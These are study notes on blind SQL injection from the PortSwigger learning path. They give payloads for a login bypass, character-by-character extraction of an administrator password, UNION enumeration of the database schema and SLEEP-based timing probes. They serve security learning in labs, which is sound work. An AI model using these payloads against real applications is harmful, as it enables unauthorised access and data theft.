#+title: Blind SQL Injection
#+description: Notes about Blind SQL injection attack from learning path of Portswigger
#+author: [[https://github.com/touhidulshawan][Touhidul Shawan]]

* Table of Contens :toc:
- [[#what-is-blind-sql-injection][What is Blind SQL Injection]]
- [[#exploiting-blind-sql-injection-by-triggering-conditional-response][Exploiting Blind SQL injection by triggering conditional response]]
- [[#authentication-bypass][Authentication Bypass]]
- [[#boolean-based][Boolean Based]]
- [[#time-based][Time Based]]

* What is Blind SQL Injection
Blind SQL injection arises when an application is vulnerable to SQL injeciton, but it's HTTP responses do not contain the results of the relevant SQL query or the details of any database errors

Many techniques such as ~UNION~ attacks are not effective because they rely on beign able to see the results of the injected query within the application's response

* Exploiting Blind SQL injection by triggering conditional response
An application uses tracking cookies to track about usages like
~Cookie: TrackingID=somerandomstring~
It use a SQL query like this
#+begin_src sql
  SELECT TrackingID FROM TrackedUsers WHERE TrackingID = 'somerandomstring'
#+end_src
This query is vulnerable to SQL injection, but the result from the query are not returned to the users. This is blind SQL injection. However, the application does behave differently depending on whether the query returns any data. If it returns data(because a recognized TrackingID was submitted), then a 'Welcome Back' message is displayed within the page. This behaior is enough to exploit the blind SQL injection vulnerability.

#+begin_src sql
  ' AND '1'='1 
  ' AND '1'='2
#+end_src
The first of these values will cause the query to return results, because the injected ~AND '1'='1~ condition is true and so the 'Welcome Back' message will be displayed. But second value will cause the query to not return any results, because the injected condition is false, and the message will not be displayed. /This allows us to determine the answer to any single injected condition, and so extract data one bit at a time./

#+begin_src sql
  xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm
#+end_src

*** Lab
- [[https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses][Blind SQL injection with conditional responses]]

* Authentication Bypass
In login machanism
#+begin_src sql
  select * from users where username='%username%' and password='%password%' LIMIT 1;
#+end_src
=%username%= and =%password%= values are take from the login form. To make this into a query that always return true, we can enter into password field
#+begin_src sql
 ' OR 1=1;-- 
#+end_src
Which turn the SQL query into
#+begin_src sql
 select * from users where username='%username%' and password='%password%' OR 1=1; 
#+end_src
Since 1=1 always true and use or operator so this query will always return true

* Boolean Based
+ determine number of columns
#+begin_src sql
 admin123' UNION SELECT 1;-- 
#+end_src
/increase until succeed/
#+begin_src sql
 admin123' UNION SELECT 1,2,3;-- 
#+end_src
+ retrieve database name
#+begin_src sql
admin123' UNION SELECT 1,2,3 where database() like 's%';--
#+end_src
+ retreive table name
#+begin_src sql
 admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'a%';-- 
#+end_src
+ retrieve column name
#+begin_src sql
  admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%';
#+end_src
* Time Based
- similar to boolean based query
- indicator of a correct query is based on the time the query takes to complete.
- determine the number of column
#+begin_src sql
admin12' UNION SELECT SLEEP(5);--
#+end_src
/if there is no pause in the response time, we know the query was unsuccessful, so have to add another column/
#+begin_src sql
 admin12' UNION SELECT SLEEP(5),2;--
#+end_src
